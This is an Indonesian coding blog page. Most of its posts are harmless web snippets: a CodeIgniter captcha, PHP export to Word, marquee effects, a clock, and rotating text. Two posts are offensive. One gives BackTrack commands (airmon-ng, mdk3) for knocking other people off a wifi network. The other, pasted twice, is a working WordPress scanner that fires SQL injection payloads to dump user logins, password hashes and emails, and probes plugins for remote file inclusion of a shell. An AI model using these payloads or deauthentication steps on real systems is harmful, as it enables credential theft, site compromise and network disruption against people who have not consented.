Sabtu, 30 Juni 2012

membuat source code CAPCHA dengan PHP


Setelah tutorial sebelumnya  disini saya akan mencoba untuk memberikan beberapa cara dalam pembuatan “Chaptcha” pada posting sederhana ini dengan singkat. Yaitu tentang membuat Captcha di Codeigniter 2.0.x. Mungkin banyak sudah tahu semenjak Codeigniter merilis versi 2.0.x tidak ada plugin lagi. sehingga captcha yang tadinya di plugin sekarang berada di helper.
Pertama-tama untuk membuat captcha di codeigniter yang simple, kita bisa menggunakan codingan dibawah ini:

[php]
<?php
function captcha(){
$this->load->helper(’captcha’);
$vals = array(
‘word’ => ‘Random word’,
‘img_path’ => ‘captcha/’,
‘img_url’ => ‘<a href=”http://localhost/belajar/codeigniter/captcha/”>http://localhost/belajar/codeigniter/captcha/</a>’,
‘img_width’ => ‘150′,
‘img_height’ => 30,
‘expiration’ => 7200
);
$cap = create_captcha($vals);
echo $cap['image'];
}
[/php]
Pada Codingan tersebut arti dari ‘word’ => ‘random word’ itu artinya nanti captchanya akan membuat tulisan Random word. sedangkan ‘img_path’ itu artinya letak dimana folder captcha akan disave di hostingan. kemudian pada ;img_url’ itu artinya link images folder yang akan kita load untuk menampilkan gambar captchanya. Misalkan disini saya mengisntal codeigniter di folder ‘belajar/codeigniter’ dan saya membuat folder captcha sebagai tempat save gambar captchanya disini. Maka img_url nya akan seperti gambar diatas. sedangkan sisa codingannya tidak perlu saya jelaskan pun mungkin sudah banyak yang mengerti.
Kemudian setelah dari $vals yang memuat array diatas. dibuatlah $cap = create_captcha($vals) yang dimana berfungsi untuk proses captchanya.  terakhir untuk menampilkan gambar captchanya tinggal di echo $cap['image'].
Kurang lebih hasilnya akan seperti ini :
Membuat Captcha Pada Codeigniter
loh kok tulisannya Random word beneran? Hehe, itu karena kita belum membuat generator captchanya. Sekarang coba kita tambahkan sedikit codingannya.
[php]
<?php
..
function captcha(){
$this->load->helper(’captcha’);
$str = ‘ABCDEFGHJKLMNOPQRSTUVWXYZ1234567890abcdefghjklmnopqrstuvwxyz’;
$random_word= str_shuffle($str);
$random_word= substr($random_word,0,4);
$vals = array(
‘word’ => $random_word,
);
}
[/php]
Nah, gennerator captcha tersebut akan menghasilkan huruf kapital, huruf kecil dan juga angka. kemudian panjang karakter captcha yang akan kita buat akan sepanjang 4 karakter. Nah, sekarang coba di refresh atau di load ulang halaman yang ada captchanya.
Semoga Bermanfaat.
Diposting oleh di Tidak ada komentar:

source code PHP untuk export to word


<?php
$content = “This is test page”;

// Size – Denotes A4, Legal, A3, etc ——- size:8.5in 11.0in; for Legal size
// Margin – Set the margin of the word document – margin:0.5in 0.31in 0.42in 0.25in; [margin: top right bottom left]

$word_xmlns = “xmlns:o=’urn:schemas-microsoft-com:office:office’ xmlns:w=’urn:schemas-microsoft-com:office:word’ xmlns=’http://www.w3.org/TR/REC-html40'”;
$word_xml_settings = “<xml><w:WordDocument><w:View>Print</w:View><w:Zoom>100</w:Zoom></w:WordDocument></xml>”;
$word_landscape_style = “@page {size:8.5in 11.0in; margin:0.5in 0.31in 0.42in 0.25in;} div.Section1{page:Section1;}”;
$word_landscape_div_start = “<div class=’Section1'>”;
$word_landscape_div_end = “</div>”;
$content = ‘
<html ‘.$word_xmlns.’>
<head>‘.$word_xml_settings.’<style type=“text/css”>
‘.$word_landscape_style.’ table,td {border:0px solid #FFFFFF;} </style>
</head>
<body>‘.$word_landscape_div_start.$content.$word_landscape_div_end.’</body>
</html>
‘;

@header(‘Content-Type: application/msword’);
@header(‘Content-Length: ‘.strlen($content));
@header(‘Content-disposition: inline; filename=”testdocument.doc”‘);
echo $content;

?>
Diposting oleh di Tidak ada komentar:

Cara membuat tulisan berjalan (Efek marquee)


Tulisan berjalan atau sering disebut dengan Efek marquee adalah suatu program HTML untuk membuat text berjalan baik itu secara horizontal maupun vertikal. Efek marquee ini banyak diminati oleh para blogger karena selain mempercantik tapilan blog Efek marquee juga dapat menarik perhatian pengunjung. text berjalan atau Efek marquee ini biasa digunakan para blogger untuk menampilkan sebuah pesan, link, ataupun banner. Contoh-contoh efek marquee dan cara membuatnya dapat anda lihat disini:

  1. Marquee dasar
    2. kode HTML nya adalah :

    <marquee>Kalimat Anda</marquee>

    Hasilnya adalah seperti ini :

    Kalimat Anda

  2. Marquee yang bergerak dari kiri kekanan
    3. kode HTML-nya adalah

    <marquee direction="right">Kalimat Anda</marquee>

    Hasilnya adalah seperti ini :

    Kalimat Anda

  3. Marquee yang berjalan kekiri dan kekanan
    4. Kode HTML-nya adalah :

    <marquee behavior="alternate">Kalimat Anda</marquee>

    Hasilnya adalah seperti ini :

    Kalimat Anda

  4. Marquee dari kanan ke kiri, tapi saat mouse berada diatas tulisan makan tulisan akan berhenti

    5. Kode HTML-nya adalah :

    <marquee onmouseover="this.stop()" onmouseout="this.start()">Kalimat Anda</marquee>

    Hasinya adalah seperti ini :

    Akan berhenti saat mouse diatas kalimat Anda

  5. Morquee yang berjalan kekiri dan kekanan tetapi kecepatan gerak text dapat anda atur
    6. Kode HTML-nya adalah :

    <marquee behavior="alternate" scrollamount="18">Kalimat Anda</marquee>

    Hasinlnya adalah seperti ini:

    Kalimat Anda

  6. Marquee yang bergerak dari bawah keatas
    7. Kode HTML-nya adalah :

    <marquee direction="up">Kalimat Anda</marquee>

    Hasinya adalah seperti ini :

    Kalimat Anda

  7. Marquee dengan pembatas dan tilisan anda akan berhenti saat mos diatasnya
    8. Kode HTML-nya adalah :

    <marquee direction="up" onmouseover="this.stop()" width="200" scrollamount="3" onmouseout="this.start()" height="100">Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>
    </marquee>

    Hasilnya adalah seperti ini :

    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda

  8. Marquee yang bergerak kebawah tanpa kode mouseover
    9. Kode HTML-nya adalah :

    <marquee direction="down" width="200" scrollamount="4" height="100">Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>
    </marquee>

    Hasilnya adalah seperti ini :

    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda

  9. Yang terakhir adalah Marquee dengan perintah "Center" agar tulisan berada ditengah
    10. Kode HTML-nya adalah :

    <center>
    <marquee direction="up" onmouseover="this.stop()" width="200" scrollamount="1" onmouseout="this.start()" height="100">Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>Kalimat Anda<br>
    </marquee>
    </center>

    Hasilnya adalah seperti ini :

    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
    Kalimat Anda
 Itulah beberapa contoh  Efek Marquee atau Tulisan Berjalan. Dari beberapa contoh diatas saya arasa anda sudah paham mengenai Kode-kode HTML untuk efek marquee diatas jadi sailahkan kereasikan sesuai dengan keinginan anda.

SELAMAT MENCOBA DAN TERIMA KASIH
Diposting oleh di Tidak ada komentar:

cara putuskan jaringan wifi dengan BACK TRACK 5

ikuti langkah2 source code berikut dan ketik di terminal
1. airmon-ng start wlan0
2. airodump-ng mon0 -t opn
3.mdk3 mon0 d -c 1 (1 berarti nama chanel jaringan di t4 wifi/hotspot tersebut)

SELAMAT MENCOBA .................!!!!
Diposting oleh di Tidak ada komentar:

Setting modem dial up pada backtrack

Setelah satu minggu backtrack saya diem tanpa ada koneksi, akhirnya bisa juga di pake ngenet, langsung aja bapak ibu,
-download wvdial (searching di google banyak kok)
-pindahin ke folder root trus buka terminal dan install dengan ketik dpkg -i wvdial.deb
-lihat id vendor dan id produk dari modem anda dengan ketik lsusb di terminal. biasanya akan tampil seperti ini:
Bus 002 Device 012: ID 0eab:511f
Bus 002 Device 003: ID 1c4f:0003 SiGma Micro HID controller
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
0eab:511f <-- ini id saya (saya memakai speed up cdma su6380)
-ketik echo "usbserial vendor=0x0eab product=0x511f" | sudo tee -a /etc/modules > /dev/null

-cek apakah modem anda terdetect dengan mengetikkan wvdialconf pada terminal
-kemudian edit wvdial.conf. ketik gedit /etc/wvdial.conf
-masukkan script seperti di bawah

[Dialer saya]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Stupid Mode = 1
Modem Type = Analog Modem
Command Line = ATDT
ISDN = 0
New PPPD = yes
Phone = #777
Modem = /dev/ttyUSB0
Username = xxxxx@free
Password = xxxxx
Baud = 460800

(ganti username dan passwordnya sesuai dengan username dan password internet anda)

-save. kemudian silahkan connect dengan perintah "wvdial saya" pada terminal ( tanpa tanda petik )
-silahkan mencoba, klw ada tambahan mohon di koreksi. thanks
Diposting oleh di Tidak ada komentar:

Source code untuk menampilkan suara di website

<object data="http://flash-mp3-player.net/medias/player_mp3.swf" width="0" height="0" type="application/x-shockwave-flash"> 
<param value="#ffffff" name="bgcolor"><br /> 
<param value="mp3=http://dc237.4shared.com/img/821760498/c13a507e/dlink__2Fdownload_2FWfwEa6hu_3Ftsid_3D20111003-075008-775053e9/preview.mp3&loop=1&autoplay=1&volume=150" name="FlashVars"> 
</object>



Penjelasan:
"http://dc237.4shared.com/img/821760498/c13a507e/dlink__2Fdownload_2FWfwEa6hu_3Ftsid_3D20111003-075008-775053e9/preview.mp3 " maksudnya--> masukkan link suara bisa dalam format mp3,wav dll dech........kalian bisa cari di mbah saya google........
Diposting oleh di Tidak ada komentar:

Source code untuk tulisan berputar dengan javascript

<style type="text/css">
/* Circle Text Styles */
#outerCircleText {
/* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */
font-style: italic;
font-weight: bold;
font-family: 'comic sans ms', verdana, arial;
color:ORANGE ;
/* End Optional */

/* Start Required - Do Not Edit */
position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;}
#outerCircleText div {position: relative;}
#outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;}
/* End Required */
/* End Circle Text Styles */
</style>
<script type="text/javascript">


;(function(){

// Your message here (QUOTED STRING)
var msg = "! sniper!";

/* THE REST OF THE EDITABLE VALUES BELOW ARE ALL UNQUOTED NUMBERS */

// Set font's style size for calculating dimensions
// Set to number of desired pixels font size (decimal and negative numbers not allowed)
var size = 24;

// Set both to 1 for plain circle, set one of them to 2 for oval
// Other numbers & decimals can have interesting effects, keep these low (0 to 3)
var circleY = 0.75; var circleX = 2;

// The larger this divisor, the smaller the spaces between letters
// (decimals allowed, not negative numbers)
var letter_spacing = 5;

// The larger this multiplier, the bigger the circle/oval
// (decimals allowed, not negative numbers, some rounding is applied)
var diameter = 10;

// Rotation speed, set it negative if you want it to spin clockwise (decimals allowed)
var rotation = 0.4;

// This is not the rotation speed, its the reaction speed, keep low!
// Set this to 1 or a decimal less than one (decimals allowed, not negative numbers)
var speed = 0.3;

////////////////////// Stop Editing //////////////////////

if (!window.addEventListener && !window.attachEvent || !document.createElement) return;

msg = msg.split('');
var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
o = document.createElement('div'), oi = document.createElement('div'),
b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,

mouse = function(e){
e = e || window.event;
ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
},

makecircle = function(){ // rotation/positioning
if(init.nopy){
o.style.top = (b || document.body).scrollTop + 'px';
o.style.left = (b || document.body).scrollLeft + 'px';
};
currStep -= rotation;
for (var d, i = n; i > -1; --i){ // makes the circle
d = document.getElementById('iemsg' + i).style;
d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
};
},

drag = function(){ // makes the resistance
y[0] = Y[0] += (ymouse - Y[0]) * speed;
x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
for (var i = n; i > 0; --i){
y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
x[i] = X[i] += (x[i-1] - X[i]) * speed;
};
makecircle();
},

init = function(){ // appends message divs, & sets initial values for positioning arrays
if(!isNaN(window.pageYOffset)){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
} else init.nopy = true;
for (var d, i = n; i > -1; --i){
d = document.createElement('div'); d.id = 'iemsg' + i;
d.style.height = d.style.width = a + 'px';
d.appendChild(document.createTextNode(msg[i]));
oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
};
o.appendChild(oi); document.body.appendChild(o);
setInterval(drag, 25);
},

ascroll = function(){
ymouse += window.pageYOffset;
xmouse += window.pageXOffset;
window.removeEventListener('scroll', ascroll, false);
};

o.id = 'outerCircleText'; o.style.fontSize = size + 'px';

if (window.addEventListener){
window.addEventListener('load', init, false);
document.addEventListener('mouseover', mouse, false);
document.addEventListener('mousemove', mouse, false);
if (/Apple/.test(navigator.vendor))
window.addEventListener('scroll', ascroll, false);
}
else if (window.attachEvent){
window.attachEvent('onload', init);
document.attachEvent('onmousemove', mouse);
};

})();

</script>


NB:
Sisipkan code tersebut diantara <head>code nya</head>
Diposting oleh di Tidak ada komentar:

contoh source code untuk menampilkan jam di website

<html>
<head>
<title>jam</title>
<script type="text/javascript">
function tampilkanjam() {
var waktu= new Date();
var jam= waktu.getHours();
var menit= waktu.getMinutes();
menit= ((menit < 10) ? "0" : "") + menit;
var detik= waktu.getSeconds();
detik= ((detik < 10) ? "0" : "") + detik;
var jamSekarang= jam + ":" + menit + ":" + detik;
document.getElementById("jam").innerHTML= jamSekarang;
window.setTimeout("tampilkanjam()", 1000)
}
</script>
</head>

<body onload="tampilkanjam()">
jam Sekarang: <span id="jam"></span>
</body>
</html>
Diposting oleh di Tidak ada komentar:

Minggu, 10 Juni 2012

RAW Paste Data


#!/usr/bin/python
#WordPress SQL/RFI/CGI scanner. SQL will check
#for md5's in the source and RFI/CGI will use
#http responses.


import sys, urllib2, re, time, httplib

#Bad HTTP Responses
BAD_RESP = [400,401,404]

def main(path):
    print "[+] Testing:",host.split("/",1)[1]+path
    try:
        h = httplib.HTTP(host.split("/",1)[0])
        h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
        h.putheader("Host", host.split("/",1)[0])
        h.endheaders()
        resp, reason, headers = h.getreply()
        return resp, reason, headers.get("Server")
    except(), msg:
        print "Error Occurred:",msg
        pass

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

print "\n\t  visit me www[dot]flazer-404[dot]com"
print "\t------------------------------------------"

sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
    "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
    "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
    "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
    "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
    "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--"
    "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
    "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
    "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
    "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
    "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
    "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain"]

rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
    "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell",
    "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell",
    "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell",
    "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell",
    "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell",
    "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"}

cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
    "wp-admin/users.php":"http://milw0rm.com/exploits/1059",
    "xmlrpc.php":"http://milw0rm.com/exploits/1077",
    "wp-includes/cache.php":"http://milw0rm.com/exploits/6",
    "wp-trackback.php":"http://milw0rm.com/exploits/3095",
    "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814",
    "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960",
    "wp-app.php":"http://milw0rm.com/exploits/4113",
    "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695",
    "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844",
    "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013",
    "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035",
    "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"}

if len(sys.argv) != 2:
    print "\nUsage: ./wpscan.py <site+dir>"
    print "Ex: ./wpscan.py www.site.com/wp-content/\n"
    sys.exit(1)

host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
if host[-1] != "/":
    host = host+"/"
   
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)
print "[+] RFI Loaded:",len(rfis)
print "[+] CGI Loaded:",len(cgis)

server = main("/")[2]
print "[+] Server:",server

print "\n[+] Started:",timer()

print "\n[+] Scanning: SQL\n"
for sql in sqls:
    time.sleep(2) #Change this if needed
    print "[+] Trying:",sql.replace("\n","")
    try:
        source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n\t[+]MD5:",md5
    except(urllib2.HTTPError):
        pass
print "\n[+] Scanning: RFI\n"
for rfi, shell in rfis.items():
    resp,reason,server = main(rfi)
    if resp not in BAD_RESP:
        print "\t[+] Got:",resp, reason
        print "\t[+] Try:",host+shell
    else:
        print "\t[-] Got:",resp, reason
print "\n[+] Scanning: CGI\n"
for cgi, expl in cgis.items():
    resp,reason,server = main(cgi)
    if resp not in BAD_RESP:
        print "\t[+] Got:",resp, reason
        print "\t[+] Check:",expl
    else:
        print "\t[-] Got:",resp, reason
print "\n[-] Done\n"
Diposting oleh di Tidak ada komentar:

WordPress SQL/RFI/CGI scanner


  1. #!/usr/bin/python
  2. #WordPress SQL/RFI/CGI scanner. SQL will check
  3. #for md5's in the source and RFI/CGI will use
  4. #http responses.
  5.  
  6.  
  7. import sys, urllib2, re, time, httplib
  8.  
  9. #Bad HTTP Responses
  10. BAD_RESP = [400,401,404]
  11.  
  12. def main(path):
  13.     print "[+] Testing:",host.split("/",1)[1]+path
  14.     try:
  15.         h = httplib.HTTP(host.split("/",1)[0])
  16.         h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
  17.         h.putheader("Host", host.split("/",1)[0])
  18.         h.endheaders()
  19.         resp, reason, headers = h.getreply()
  20.         return resp, reason, headers.get("Server")
  21.     except(), msg:
  22.         print "Error Occurred:",msg
  23.         pass
  24.  
  25. def timer():
  26.     now = time.localtime(time.time())
  27.     return time.asctime(now)
  28.  
  29. print "\n\t  visit me www[dot]flazer-404[dot]com"
  30. print "\t------------------------------------------"
  31.  
  32. sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
  33.     "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
  34.     "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
  35.     "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
  36.     "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
  37.     "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--"
  38.     "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
  39.     "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
  40.     "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
  41.     "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  42.     "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
  43.     "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  44.     "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
  45.     "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
  46.     "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain"]
  47.  
  48. rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",
  49.     "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell",
  50.     "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell",
  51.     "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell",
  52.     "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell",
  53.     "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell",
  54.     "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell",
  55.     "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell",
  56.     "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell",
  57.     "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"}
  58.  
  59. cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
  60.     "wp-admin/users.php":"http://milw0rm.com/exploits/1059",
  61.     "xmlrpc.php":"http://milw0rm.com/exploits/1077",
  62.     "wp-includes/cache.php":"http://milw0rm.com/exploits/6",
  63.     "wp-trackback.php":"http://milw0rm.com/exploits/3095",
  64.     "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814",
  65.     "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960",
  66.     "wp-app.php":"http://milw0rm.com/exploits/4113",
  67.     "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695",
  68.     "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844",
  69.     "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013",
  70.     "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035",
  71.     "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"}
  72.  
  73. if len(sys.argv) != 2:
  74.     print "\nUsage: ./wpscan.py <site+dir>"
  75.     print "Ex: ./wpscan.py www.site.com/wp-content/\n"
  76.     sys.exit(1)
  77.  
  78. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
  79. if host[-1] != "/":
  80.     host = host+"/"
  81.    
  82. print "\n[+] Site:",host
  83. print "[+] SQL Loaded:",len(sqls)
  84. print "[+] RFI Loaded:",len(rfis)
  85. print "[+] CGI Loaded:",len(cgis)
  86.  
  87. server = main("/")[2]
  88. print "[+] Server:",server
  89.  
  90. print "\n[+] Started:",timer()
  91.  
  92. print "\n[+] Scanning: SQL\n"
  93. for sql in sqls:
  94.     time.sleep(2) #Change this if needed
  95.     print "[+] Trying:",sql.replace("\n","")
  96.     try:
  97.         source = urllib2.urlopen("http://"+host+sql.replace("\n","")).read()
  98.         md5s = re.findall("[a-f0-9]"*32,source)
  99.         if len(md5s) >= 1:
  100.             print "[!]",host+sql.replace("\n","")
  101.             for md5 in md5s:
  102.                 print "\n\t[+]MD5:",md5
  103.     except(urllib2.HTTPError):
  104.         pass
  105. print "\n[+] Scanning: RFI\n"
  106. for rfi, shell in rfis.items():
  107.     resp,reason,server = main(rfi)
  108.     if resp not in BAD_RESP:
  109.         print "\t[+] Got:",resp, reason
  110.         print "\t[+] Try:",host+shell
  111.     else:
  112.         print "\t[-] Got:",resp, reason
  113. print "\n[+] Scanning: CGI\n"
  114. for cgi, expl in cgis.items():
  115.     resp,reason,server = main(cgi)
  116.     if resp not in BAD_RESP:
  117.         print "\t[+] Got:",resp, reason
  118.         print "\t[+] Check:",expl
  119.     else:
  120.         print "\t[-] Got:",resp, reason
  121. print "\n[-] Done\n"
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)